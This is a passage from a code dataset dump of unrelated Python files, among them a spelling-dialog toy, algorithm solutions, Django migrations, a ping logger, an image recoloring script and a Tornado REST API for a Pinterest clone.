\"\"\"\n def __init__(self, master, word_data: 
NewWordEventData):\n \"\"\"\n :param master: The dialog's master widget. Should be an EditorWindow.\n :param word_data: Object containing information regarding the starting\n index, ending index and contents of the word to be\n corrected.\n \"\"\"\n super().__init__(master)\n\n self.word = word_data.word.lower()\n self.start = word_data.start\n self.end = word_data.end\n\n self.set_message(\n f\"Looks like the word '{word_data.word}' could be a \"\n \"misspelling.\\n\"\n \"Below are some suggested corrections.\\n\"\n \"If you don't pick one within 10 seconds I'll pick one for you,\\n\"\n \"to save you time. :)\"\n )\n\n # Generate a correction to the word.\n corrected_word = correction(self.word)\n\n self.suggestions = [corrected_word]\n\n # Generate up to 3 misspellings of the corrected word.\n for i in range(3):\n suggestion = misspell(corrected_word, 3)\n if suggestion and suggestion not in self.suggestions:\n self.suggestions.append(suggestion)\n\n # Add all generated suggestions as choices.\n for suggestion in random.sample(\n self.suggestions, len(self.suggestions)\n ):\n self.add_choice(suggestion)\n\n self.set_time_limit(10)\n self.choice_made.add_callback(self.replace_word)\n\n def replace_word(self, choice_data: CloppyChoiceMadeEventData):\n \"\"\"\n Called when the user makes a choice in this dialog.\n\n :param choice_data: Object containing information about the user's\n choice.\n \"\"\"\n self.master.set_text(\n choice_data.choice, self.start, self.end\n )\n\n def time_out(self):\n \"\"\"\n Called when the user fails to select a choice within the time limit.\n \"\"\"\n self.make_choice(random.choice(self.suggestions))\n","sub_path":"project/windows/cloppy_spelling_window.py","file_name":"cloppy_spelling_window.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"647807751","text":"class Solution(object):\n def numMatchingSubseq(self, S, words):\n ans = 0\n heads = [[] for _ in xrange(26)]\n for word in words:\n it = iter(word)\n heads[ord(next(it)) - ord('a')].append(it)\n\n for letter in S:\n letter_index = ord(letter) - ord('a')\n old_bucket = heads[letter_index]\n heads[letter_index] = []\n\n while old_bucket:\n it = old_bucket.pop()\n nxt = next(it, None)\n if nxt:\n heads[ord(nxt) - ord('a')].append(it)\n else:\n ans += 1\n\n return ans\n","sub_path":"algorithms/problem_0792/leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"156932628","text":"\"\"\"\nSets the has_extra_chords value on existing songs.\n\"\"\"\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n help = \"Runs full_clean on all songs to properly set has_extra_chords.\"\n\n def handle(self, *args, **options):\n from songs.models import Song\n for song in Song.objects.all():\n if song.lyrics:\n before = song.has_extra_chords\n song.full_clean()\n song.save()\n after = song.has_extra_chords\n print(\"%s: %s -> %s\" % (song, before, after,))\n","sub_path":"songs/management/commands/set_has_extra_on_songs.py","file_name":"set_has_extra_on_songs.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495311530","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import 
migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('account', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='customuser',\n name='following',\n field=models.ManyToManyField(blank=True, null=True, related_name='followers', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='customuser',\n name='profile_pic',\n field=models.ImageField(upload_to='profile_pics/', blank=True, null=True),\n ),\n ]\n","sub_path":"account/migrations/0002_auto_20151202_1430.py","file_name":"0002_auto_20151202_1430.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495884510","text":"import ccxt\nfrom ..base.api import ApiBase\n\nccxt_binance = ccxt.binance()\nccxt_binance.load_markets()\n\n\nclass BinanceApi(ApiBase, ccxt.binance):\n def __init__(self, ccxt_config):\n ApiBase.__init__(self)\n ccxt.binance.__init__(self, ccxt_config)\n self.future = self.options.get('defaultType') == 'future'\n\n def listen_key(self, method='POST'):\n # POST: create new\n # PUT: keep alive (every 30 minutes)\n # DELETE: close\n if self.future:\n return self.request('listenKey', 'fapiPrivate', method)\n else:\n return self.request('userDataStream', 'v3', method)\n","sub_path":"botfw/binance/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"251128624","text":"import pandas as pd\nfrom PIL import Image\n\ncounter = 0\ndef getImgSize(path):\n global counter\n counter += 1\n print(counter)\n #print(Image.open(str(path)).size)\n return Image.open(str(path)).size\n\ndef saveData(df):\n with open(\"image_sizes.csv\", \"w\") as writeFile:\n df.to_csv(writeFile, index = False)\n writeFile.close()\ndef getSize(tup):\n return tup[0] * tup[1]\n\ndef main():\n #images = \"./existing_image.csv\"\n images = \"./image_sizes.csv\"\n pd.set_option('display.max_colwidth', -1)\n df = pd.read_csv(images, header = 0)\n print(df[\"SIZE\"].mean())\n print(df[df[\"SIZE\"] == df[\"SIZE\"].min()])\n print(df[df[\"SIZE\"] == df[\"SIZE\"].max()])\n #row = df.sample(n = 1).reset_index(drop = True)\n # df[\"DIM\"] = df[\"IMG\"].apply(getImgSize)\n # df[\"SIZE\"] = df[\"DIM\"].apply(getSize)\n# df[\"IMG_DIMS\"] = df[\"IMG\"].apply(getImgSize)\n print(df)\n# saveData(df)\nif __name__ == \"__main__\":\n main()\n# filename = os.path.join('path', 'to', 'image', 'file')\n# img = Image.open(filename)\n# print img.size\n","sub_path":"check_img_size.py","file_name":"check_img_size.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"269034719","text":"#NEED - VITAL\nfrom Myro import *\n\n#import file - MUST use the file name + \".jpg\" otherwise will not be able to call up correct file\nfilename = \"your.jpg\"\n\n#creates function = makes picture (takes in each pixel of the imported picture)\n#\"pic\" is the name of the function\n#\"makePicture\" is an already-predefined function in this program, it takes in each pixel of the imported picture file)\n#\"filename\" is a PARAMETER, this parameter calls up the variable \"filename\" and what was stored in it, in our case,\n# is the called up file \"Revs.jpg\"\npic = makePicture(filename)\n#show(pic) displays the image\nshow(pic)\n#check - play it, see if it works\n\n#set colors to variables, 
assigns the RGB characteristics of a color to a \"color\" variable\n#KEEP THESE THE SAME FOR ALL and give everyone these numbers (write on whiteboard or something...)\nDarkBlue = makeColor(0,51,76)\nRed = makeColor(217,26,33)\nBlue = makeColor(112,150,158)\nYellow = makeColor(252, 227, 166)\n\n#set color\n\n#\"pixelList\" is a list of all the pixels in the image\n#\"getPixels\" is a predefined function\n#\"(pic)\" is a parameter of the \"getPixels\" function and calls up our image - \"Revs.jpg\"\npixelList = getPixels(pic)\n\n#a for loop that goes through every pixel in pixelList; goes through each pixel in our image\nfor pixel in pixelList:\n\n    #gets the (R,G,B) value of EACH pixel\n    #\"getRed\", \"getGreen\", \"getBlue\" are all predefined functions\n    #\"(pixel)\" is a parameter of each function that calls up each pixel in the image\n    r = getRed(pixel)\n    g = getGreen(pixel)\n    b = getBlue(pixel)\n\n    #if R or G or B values of a pixel are HIGHER than 180, then sets color to yellow\n    if r > 180 or g > 180 or b > 180:\n        setColor(pixel, Yellow)\n\n    #else, if R or G or B values of a pixel are HIGHER than 120, then sets color to blue\n    elif r > 120 or g > 120 or b > 120:\n        setColor(pixel, Blue)\n\n    #else, if R or G or B values of a pixel are HIGHER than 60, then sets color to red\n    elif r > 60 or g > 60 or b > 60:\n        setColor(pixel, Red)\n\n    #else, if R or G or B values of a pixel are HIGHER than 0, then sets color to dark blue\n    elif r > 0 or g > 0 or b > 0:\n        setColor(pixel, DarkBlue)\n\n#SHOW PIC\n#saves image to the same folder under the name \"RevsObamafied.jpg\"\n#they can change the name \"RevsObamafied\" to whatever name but MUST keep the \".jpg\"\n#they can keep the \"Obamafied\" part of name to avoid overwriting the original image\nsavePicture(pic, \"newyour.jpg\")\n#hit the GREEN circle button at the top to run the program\n#screen with image will pop up, wait until the entire picture Obamafies and then look it up in your folder\n#larger pictures take more time... wait until RED dot turns GREEN => image is done\n#if their images did not turn out too well - less contrast than preferred, then tell them to change/play with the \"if\"/\"elif\" function numbers\n#thanks guys! Really appreciate your help! ^.^ ~Revs, USSR\n","sub_path":"Obamafication.py","file_name":"Obamafication.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"550457759","text":"# Copyright 2012 Google Inc. 
All Rights Reserved.\n\n\"\"\"Representation for an Earth Engine ImageCollection.\"\"\"\n\n\n\n# Dont bug me about the invalid names; it's on purpose.\n#pylint: disable-msg=C6409\n\nimport collections\nimport copy\n\nimport collection\nimport ee_exception\nimport image\nimport serializer\n\n\nclass ImageCollection(collection.Collection):\n \"\"\"Representation for an Earth Engine ImageCollection.\"\"\"\n\n def __init__(self, args): # pylint: disable-msg=W0231\n \"\"\"ImageCollection constructor.\n\n Args:\n args: ImageCollections can be constructed from the following arguments:\n A string: the asset ID of an image collection,\n An iterable of images, or anything that can be used to construct\n an image (ids, constants, etc).\n A single image.\n A dictionary: a collections's JSON description.\n\n Raises:\n EEException: if passed something other than the above.\n \"\"\"\n if isinstance(args, image.Image):\n args = [args]\n\n if isinstance(args, basestring):\n # Get an asset by AssetID\n args = {'type': 'ImageCollection', 'id': args}\n elif isinstance(args, dict): # Must check for dict before iterable.\n args = copy.deepcopy(args)\n elif isinstance(args, collections.Iterable):\n # A manually created collection.\n args = {'type': 'ImageCollection',\n 'images': [image.Image(x) for x in args]}\n elif isinstance(args, collection.Collection):\n args = copy.deepcopy(args._description) # pylint: disable-msg=W0212\n else:\n raise ee_exception.EEException('Unrecognized constructor argument.')\n\n self._description = args\n\n def getMapId(self, vis_params):\n \"\"\"Fetch and return a MapID.\n\n This mosaics the collection to a single image and return a mapid suitable\n for building a Google Maps overlay.\n\n Args:\n vis_params: The visualization parameters.\n\n Returns:\n A mapid and token.\n \"\"\"\n return self.mosaic().getMapId(vis_params)\n\n def mosaic(self):\n \"\"\"Wrap this collection in a SimpleMosaic function.\"\"\"\n return image.Image({'creator': 'SimpleMosaic', 'args': [self]})\n\n def combine(self, other):\n \"\"\"Combine two ImageCollections by ID, merging bands.\n\n The collection contains one image for each image in this collection\n merged with the bands from any matching images in the other collection.\n\n Args:\n other: The second collection.\n\n Returns:\n The combined collection.\n \"\"\"\n return ImageCollection({\n 'algorithm': 'CombineCollectionBands',\n 'primary': self,\n 'secondary': other\n })\n\n def map(self,\n algorithm,\n opt_dynamicArgs=None,\n opt_constantArgs=None,\n opt_destination=None):\n \"\"\"Maps an algorithm over a collection. 
See ee.Collection.mapInternal().\"\"\"\n    return self.mapInternal(image.Image, algorithm,\n                            opt_dynamicArgs, opt_constantArgs, opt_destination)\n\n  def __str__(self):\n    \"\"\"Writes out the collection in a human-readable form.\"\"\"\n    return 'ImageCollection(%s)' % serializer.toJSON(self._description)\n\n  def __repr__(self):\n    \"\"\"Writes out the collection in an eval-able form.\"\"\"\n    return 'ee.ImageCollection(%s)' % self._description\n","sub_path":"src/packages/ee/imagecollection.py","file_name":"imagecollection.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"614403218","text":"from copy import deepcopy\n\nclass Solution(object):\n    def findCheapestPrice(self, n, flights, src, dst, K):\n        \"\"\"\n        :type n: int\n        :type flights: List[List[int]]\n        :type src: int\n        :type dst: int\n        :type K: int\n        :rtype: int\n        \"\"\"\n        int_max = 0x7fffffff\n        m = [[int_max for _ in range(n)] for _ in range(n)]\n        for f in flights:\n            m[f[0]][f[1]] = f[2]\n        dp = [[int_max for _ in range(n)] for _ in range(n)]\n        for i in range(n):\n            dp[src][i] = m[src][i]\n        for i in range(K):\n            old = deepcopy(dp[src])\n            for j in range(n):\n                if dp[src][j] < int_max:\n                    for k in range(n):\n                        if m[j][k] < int_max:\n                            dp[src][k] = min(dp[src][k], old[j] + m[j][k])\n        return dp[src][dst] if dp[src][dst] < int_max else -1\n","sub_path":"normal/787_cheapest_flights_within_k_stops.py","file_name":"787_cheapest_flights_within_k_stops.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"338447664","text":"class Calculator:\n    def __init__(self):\n        pass\n\n    def power(self, number, exponent):\n        if number < 0 or exponent < 0:\n            raise ValueError(\"n and p should be non-negative\")\n        return pow(number, exponent)\n\n\ndef read_number_pairs():\n    number_lines = int(input())\n    for _ in range(number_lines):\n        yield map(int, input().split())\n\n\ndef solve(base, exponent):\n    my_calculator = Calculator()\n    try:\n        ans = my_calculator.power(base, exponent)\n        print(ans)\n    except ValueError as error:\n        print(error)\n\n\nif __name__ == \"__main__\":\n    for n, p in read_number_pairs():\n        solve(n, p)\n","sub_path":"30days-of-code/17_exceptions2.py","file_name":"17_exceptions2.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"212982447","text":"def calc_average(numbers):\n    sumx = 0\n    for i in numbers:\n        sumx += i\n    return sumx / len(numbers)\n\n\nif __name__ == \"__main__\":\n    list_1 = [10, 12, 65, 5, 4, 53, 42]\n    print('average of', list_1,'=', calc_average(list_1))\n","sub_path":"lesson2/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"70305559","text":"from ptna import *\r\n\r\n# Execution block #\r\n\r\ndef prompt(obj):\r\n    return obj.get_name() + \":\" + obj.get_responder_name() + \"> \"\r\n\r\nprint(\"Ptna System prototype : ptna\")\r\nptna = Ptna(\"pyna\")\r\n\r\nwhile True:\r\n    inputs = input(\" > \")\r\n    if not inputs:\r\n        print(\"Bye-bye\")\r\n        break\r\n    response = ptna.dialogue(inputs)\r\n    print(prompt(ptna), response)","sub_path":"1809/180921/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"153994552","text":"\"\"\"\r\nV3: Added date support and sound on error. Added default gateway finder instead of typing it in.\r\nV3.1: Added a last disconnect. \r\nv3.2: Added a one time line that shows the date. Optimized code. Fixed bugs. Added a small debug screen.\r\n\"\"\"\r\n\r\n\r\nimport win32api, win32con\r\nimport os, re\r\nimport time\r\nimport subprocess\r\n\r\nprevNums = []\r\nmanagerNumber = 0\r\nrecentDisconnectTime = ''\r\ndateString = ''\r\n# TODO random crashes. Add an except statement for debug. Or keywait()\r\n\r\n# FIXME Records an error once before sleep.\r\n# https://stackoverflow.com/questions/16145516/detecting-computer-program-shutdown-in-python\r\n# https://stackoverflow.com/questions/1411186/python-windows-shutdown-events\r\n\r\n# TODO maybe a calculator to show how long the internet was out for?\r\n# TODO change gatewayFinder() so that it only runs once.\r\ndef pingFinder():\r\n global managerNumber\r\n global amORpm\r\n global gatewayActual\r\n commandOutput = subprocess.check_output('ping -n 1 ' + gatewayActual)\r\n commandString = str(commandOutput)\r\n timeLocator = commandString.find('time=') # usually 102 or so\r\n currentPing = int((commandString[(timeLocator + 5):(timeLocator + 6)]))\r\n if len(prevNums) <= 10: # Adds the pings to the list for averaging and printing\r\n prevNums.append(currentPing)\r\n elif len(prevNums) > 10: # Removes first entry and replaces it with the new one\r\n del prevNums[0]\r\n prevNums.append(currentPing)\r\n avgNum = int(sum(prevNums) / len(prevNums))\r\n # TODO Find a replacement for lambda\r\n clear = lambda: os.system('cls')\r\n clear()\r\n print('PingTester to ' + gatewayActual)\r\n print('Avg ping: %sms' % avgNum)\r\n for pings in prevNums: # Prints previous pings stored in prevNums\r\n print(pings, 'ms', sep='')\r\n print('\\n\\n\\nLast disconnect: ', end ='')\r\n disconnectIteration = 0\r\n for i in recentDisconnectTime:\r\n if disconnectIteration < 2:\r\n print(i, end=':')\r\n disconnectIteration += 1\r\n else:\r\n print(i, amORpm, '\\n', sep='')\r\n managerNumber = 0 # Resets the soundManager since ping was successful\r\n\r\n# TODO Needs optimization\r\ndef timesorter():\r\n global recentDisconnectTime\r\n global amORpm, dateString, hour, minutes, seconds\r\n timeLocal = win32api.GetLocalTime()\r\n dateString, amORpm ='', 'am'\r\n hour, minutes, seconds = timeLocal[4], timeLocal[5], timeLocal[6]\r\n if hour == 0: hour = 12\r\n elif hour == 12: amORpm = 'pm'\r\n elif hour > 12:\r\n hour -= 12\r\n amORpm = 'pm'\r\n # Time is done. Now to handle the dates. Written days after.\r\n dateStamp = timeLocal[1], timeLocal[3], timeLocal[0]\r\n dateIteration = 0\r\n for dates in dateStamp:\r\n if dateIteration < 2:\r\n dateString += str(dates) + '-'\r\n dateIteration += 1 # Without this, format would be '6-26-2017-'\r\n else:\r\n dateString += str(dates)\r\n recentDisconnectTime = hour, minutes, seconds\r\n return hour, minutes, seconds, amORpm, dateString, recentDisconnectTime # Returns the time of the error\r\n\r\ndef activeTester():\r\n try:\r\n pingFinder()\r\n except subprocess.CalledProcessError:\r\n print('Connection Failed!')\r\n soundManager(), timesorter(), toDateOrNotToDate()\r\n # TODO change this write command to be better. 
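Consider using a 'with open(...)' block here. 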
Call globals for time too.\r\n fd = open('ConnectionLog.txt', mode='a')\r\n fd.write('Error occurred @ %s:%s:%s%s\\n' % (hour, minutes, seconds, amORpm))\r\n fd.close()\r\n\r\ndef soundManager():\r\n global managerNumber\r\n if managerNumber == 0:\r\n win32api.MessageBeep(win32con.MB_ICONHAND)\r\n managerNumber += 1\r\n else:\r\n pass\r\n return 1 # Returns value so that it doesn't run again during same outage.\r\n\r\n# All lines in ConnectionLog get added to dateEntryDecider\r\n# The list is then parsed with the parser variable\r\n# Then, it's converted to boolean and writes the date to file if it's not there and passes if it does.\r\ndef toDateOrNotToDate():\r\n dateEntryDecider = []\r\n global dateString\r\n with open('ConnectionLog.txt') as f:\r\n for lines in f: dateEntryDecider.append(lines)\r\n parser = re.compile(dateString).search(str(dateEntryDecider))\r\n if not bool(parser):\r\n fd = open('ConnectionLog.txt', 'a')\r\n fd.write('-------------%s-------------\\n' % dateString)\r\n fd.close()\r\n else: pass\r\n## -------------------------------------------------------------------##\r\n\r\ndef gatewayFinder():\r\n global gatewayActual\r\n commandOutput = str(subprocess.check_output('ipconfig'))\r\n gatewayPlace = commandOutput.find('Default ')\r\n gatewayActual = commandOutput[gatewayPlace + 36:gatewayPlace + 47]\r\n return gatewayActual\r\n\r\n# Run once:\r\ngatewayFinder()\r\n\r\ntry:\r\n while True:\r\n activeTester()\r\n time.sleep(2)\r\nexcept:\r\n input('''This should not be seen by anyone. Tell me if you can see this.\r\n \\nDo not close this window. \r\n \\nPress enter to continue.\r\n ''')\r\n\r\n","sub_path":"pingTesterV3.2.py","file_name":"pingTesterV3.2.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"444323574","text":"#!python\n# -*- coding: utf-8 -*-\n\"\"\"\n\t@package: \tbx.FILE\n\t@author: \tKRZYSZTOF \"@K0FF.EU\" K0FF\n\t@version: \t2.17.12\n\"\"\"\nimport bx\nimport os\n\n_target = None\n_outputs = {}\n_checks = {}\n\ndef PATH( filepath, checkExists = True ):\n\tfilepath = bx.unquote( filepath )\n\tif not filepath:\n\t\tbx.error('Invalid file path \"%s\"'%(filepath))\n\t\treturn False\n\tif os.name == 'nt':\n\t\tfilepath = filepath.lower()\n\tfilepath = os.path.abspath( filepath )\n\tif os.path.isdir( filepath ):\n\t\tbx.error('Invalid file path \"%s\"'%(filepath))\n\t\treturn False\n\tif checkExists:\n\t\tif not os.path.isfile( filepath ):\n\t\t\tbx.error('File \"%s\" does not exist'%(filepath))\n\t\t\treturn False \t\t\t\n\treturn filepath\n\ndef LOAD( filepath, checkFilepath = True ):\n\tif checkFilepath:\n\t\tfilepath = bx.FILE.PATH( filepath )\n\tif filepath:\n\t\treturn open( filepath, 'r').read().splitlines()\t\t\n\tbx.error('File not loaded')\n\treturn []\n\ndef IMPORT( filepath_short ):\n\tfilepath = bx.FILE.PATH( filepath_short )\n\tif filepath:\n\t\tif filepath in _checks and _checks[ filepath ]:\n\t\t\tbx.error('Illegal recursion to file \"%s\"'%(filepath_short))\n\t\t\treturn False\n\t\telse:\n\t\t\tif bx._FLAG_DEBUG:\n\t\t\t\tbx.debug('Import: \"%s\"'%(filepath_short))\n\t\tprevious_input = bx.var._get('@input')\n\t\tbx.var._set( '@input', filepath_short )\n\t\toutput = ''\n\t\t_checks[ filepath ] = True\n\t\tcode = bx.FILE.LOAD( filepath, False )\n\t\tif code:\n\t\t\tCODE = bx.code( file=filepath_short, code=code )\n\t\t\toutput = CODE.run()\n\t\t_checks[ filepath ] = False\n\t\tbx.var._set( '@input', previous_input )\n\t\tif not output:\n\t\t\treturn 
False\n\t\treturn output\n\treturn False\n\ndef OUTPUT( filepath_short = None ):\n\tif filepath_short and bx._FLAG_DEBUG:\n\t\tbx.debug('Set current output: \"%s\"'%( filepath_short ))\n\tglobal _target\n\tbx.var._set( '@output', filepath_short )\n\tif filepath_short == None:\n\t\t_target,filepath = None,_target\n\t\treturn filepath\n\tfilepath = bx.FILE.PATH( filepath_short, False )\n\tif filepath == _target:\n\t\treturn filepath\n\tif not filepath in _outputs:\n\t\t_outputs[ filepath ] = open( filepath, 'w' )\n\tfilepath,_target = _target,filepath\n\treturn filepath\n\ndef CLOSE():\n\tfor filepath in _outputs:\n\t\tif bx._FLAG_DEBUG:\n\t\t\tbx.debug('Close file \"%s\"'%(filepath))\n\t\t_outputs[ filepath ].close()\n\ndef output( text ):\n\tif text and _target:\n\t\tif bx._FLAG_DEBUG:\n\t\t\tbx.debug('Output saved to \"%s\"'%(bx.var('@output')))\n\t\t_outputs[ _target ].write( text )\n\n#\ndef SET_OUTPUT( name, value ):\n\tbx.FILE.OUTPUT( value )\n\t\n#\nbx.reg.ex('bx.vars.set',{\n\t\t'@output': SET_OUTPUT,\n\t})\n\n#\nbx.output = output\n","sub_path":"bx/FILE.py","file_name":"FILE.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376003997","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#\n# Copyright 2016 Loren Chapple\n#\n\"\"\"\nPinterest clone -- REST API\n\"\"\"\n\n\nimport json\nimport httplib\nfrom tornado import web, gen\nfrom user import User, UnauthorizedError\nfrom pin import Pin\nfrom userpin import UserPin\n\n\nclass PinterestAPI(web.Application):\n API_MAJOR_VERSION = 1\n API_MINOR_VERSION = 0\n\n def __init__(self, path_to_frontend, log):\n super(PinterestAPI, self).__init__([(r'/api/version$', VersionHandler),\n (r'/api/v1/users$', UsersHandler, {}, UsersHandler.__name__),\n (r'/api/v1/users/([^/.]+)$', UserMaintenanceHandler, {}, UserMaintenanceHandler.__name__),\n #\n # skip concept of boards for the moment... 
and just have pins owned by user directly\n # (r'/api/v1/users/([^/.]+)/boards$', BoardsHandler, {}, BoardsHandler.__name__),\n # (r'/api/v1/users/([^/.]+)/boards/([^/.]+)$', BoardMaintenanceHandler, {}, BoardMaintenanceHandler.__name__),\n # (r'/api/v1/users/([^/.]+)/boards/([^/.]+)/pins$', UserPinsHandler, {}, UserPinsHandler.__name__),\n # (r'/api/v1/users/([^/.]+)/boards/([^/.]+)/pins/([^/.]+)$', PinMaintenanceHandler, {}, PinMaintenanceHandler.__name__),\n #\n (r'/api/v1/pins$', RawPinsHandler, {}, RawPinsHandler.__name__),\n (r'/api/v1/pins/([^/.]+)$', RawPinMaintenanceHandler, {}, RawPinMaintenanceHandler.__name__),\n (r'/api/v1/users/([^/.]+)/pins$', UserPinsHandler, {}, UserPinsHandler.__name__),\n (r'/api/v1/users/([^/.]+)/pins/([^/.]+)$', PinMaintenanceHandler, {}, PinMaintenanceHandler.__name__),\n #\n (r'/(.*)$', web.StaticFileHandler, {'path': path_to_frontend, 'default_filename': 'index.html'})],\n cookie_secret='9d007b5fa7974d9a9b41a19741eec415')\n self.log = log\n self.base_uri = None # initialized when we receive the 1st request\n\n def link(self, path):\n return self.base_uri + path\n\n def user_representation(self, user):\n rep = {'links': {'self': self.link(self.reverse_url(UserMaintenanceHandler.__name__, user.guid)),\n 'pins': self.link(self.reverse_url(UserPinsHandler.__name__, user.guid))}}\n rep.update(user.api_representation)\n return rep\n\n def pin_representation(self, pin):\n rep = {'links': {'self': self.link(self.reverse_url(RawPinMaintenanceHandler.__name__, pin.guid))}}\n rep.update(pin.api_representation)\n return rep\n\n def userpin_representation(self, userpin):\n rep = {'links': {'self': self.link(self.reverse_url(PinMaintenanceHandler.__name__, userpin.user_guid, userpin.pin_guid))}}\n rep.update(userpin.api_representation)\n return rep\n\n\n#\n# base handler to encapsulate common methods/info such as identity\n#\nclass BaseHandler(web.RequestHandler):\n AUTH_COOKIE = 'user'\n\n def prepare(self):\n super(BaseHandler, self).prepare()\n if not self.application.base_uri:\n self.application.base_uri = '{}://{}'.format(self.request.protocol, self.request.host)\n\n def compute_etag(self):\n return None # disable caching since Angular $resource doesn't deal with 304's well\n\n def get_current_user(self):\n return self.get_secure_cookie(self.AUTH_COOKIE)\n\n def set_current_user(self, guid):\n self.set_secure_cookie(self.AUTH_COOKIE, guid)\n\n def clear_current_user(self):\n self.clear_cookie(self.AUTH_COOKIE)\n\n\nclass UserResourceHandler(BaseHandler):\n def prepare(self):\n super(UserResourceHandler, self).prepare()\n # assumes first path arg in uri is the id of the resource owner\n authenticated_uid = self.get_current_user()\n if len(self.path_args) > 0 and authenticated_uid != self.path_args[0]:\n self.send_error(httplib.UNAUTHORIZED)\n\n\n#\n# admin endpoint handlers\n#\nclass VersionHandler(BaseHandler):\n def get(self):\n self.write({'major': self.application.API_MAJOR_VERSION,\n 'minor': self.application.API_MINOR_VERSION,\n 'api_version': '{}.{}'.format(self.application.API_MAJOR_VERSION, self.application.API_MINOR_VERSION)})\n\n\nclass UsersHandler(BaseHandler):\n @gen.coroutine\n def get(self):\n try:\n name = self.get_argument('name')\n pw = self.get_argument('pw')\n target_url = self.get_argument('next', None)\n except web.MissingArgumentError as e:\n self.application.log.info('Users GET (login) request malformed, error={}, url={}, body={}'.format(e, self.request.uri, self.request.body))\n self.send_error(httplib.BAD_REQUEST)\n return\n\n try:\n user 
= yield User.login(name, pw)\n except (ValueError, UnauthorizedError):\n self.send_error(httplib.UNAUTHORIZED)\n return\n\n self.set_current_user(user.guid)\n if target_url:\n self.redirect(target_url)\n else:\n self.write(self.application.user_representation(user))\n\n @gen.coroutine\n def post(self):\n try:\n body = json.loads(self.request.body)\n name = body['name']\n pw = body['pw']\n target_url = body.get('next')\n except (KeyError, ValueError, TypeError) as e:\n self.application.log.info('User creation request malformed, error={}, url={}, body={}'.format(e, self.request.uri, self.request.body))\n self.send_error(httplib.BAD_REQUEST)\n return\n\n exists = yield User.exists(name)\n if exists:\n self.send_error(httplib.CONFLICT)\n return\n\n user = User(name, pw)\n yield user.save()\n self.set_current_user(user.guid)\n if target_url:\n self.redirect(target_url)\n else:\n self.set_header('Location', self.reverse_url(UserMaintenanceHandler.__name__, user.guid))\n self.write(self.application.user_representation(user))\n self.set_status(httplib.CREATED)\n\n\nclass UserMaintenanceHandler(UserResourceHandler):\n @gen.coroutine\n def get(self, uid):\n try:\n user = yield User.fetch(uid)\n except KeyError:\n self.clear_current_user()\n self.send_error(httplib.NOT_FOUND)\n return\n\n self.write(self.application.user_representation(user))\n\n def patch(self, uid):\n raise NotImplementedError\n\n def delete(self, uid):\n raise NotImplementedError\n\n\nclass RawPinsHandler(BaseHandler):\n @gen.coroutine\n def get(self):\n limit = self.get_argument('limit', None)\n pins = yield Pin.list(limit)\n self.write({pin.guid: self.application.pin_representation(pin) for pin in pins})\n\n\nclass RawPinMaintenanceHandler(BaseHandler):\n @gen.coroutine\n def get(self, pid):\n try:\n pin = yield Pin.fetch(guid=pid)\n except KeyError:\n self.send_error(httplib.NOT_FOUND)\n return\n self.write(self.application.pin_representation(pin))\n\n\nclass UserPinsHandler(UserResourceHandler):\n @gen.coroutine\n def get(self, uid):\n limit = self.get_argument('limit', None)\n userpins = yield UserPin.list_for_user(uid, limit)\n self.write({upin.pin_guid: self.application.userpin_representation(upin) for upin in userpins})\n\n @gen.coroutine\n def post(self, uid):\n try:\n body = json.loads(self.request.body)\n pid = body.get('pin_id')\n content = body.get('content')\n image = body.get('image')\n title = body.get('title')\n caption = body.get('caption')\n private = body.get('private', False)\n if pid is None and content is None:\n raise KeyError\n except (KeyError, ValueError, TypeError):\n self.send_error(httplib.BAD_REQUEST)\n return\n\n try:\n pin = yield Pin.fetch(guid=pid, content=content)\n except KeyError:\n if not content:\n self.send_error(httplib.NOT_FOUND)\n return\n pin = Pin(content, image, title)\n yield pin.save()\n\n userpin = UserPin(uid, pin, caption, private)\n yield userpin.save()\n self.write(self.application.userpin_representation(userpin))\n self.set_status(httplib.CREATED)\n\n\nclass PinMaintenanceHandler(UserResourceHandler):\n @gen.coroutine\n def get(self, uid, pid):\n try:\n userpin = yield UserPin.fetch(uid, pid)\n except KeyError:\n self.send_error(httplib.NOT_FOUND)\n return\n self.write(self.application.userpin_representation(userpin))\n\n def patch(self, uid, pid):\n raise NotImplementedError\n\n @gen.coroutine\n def 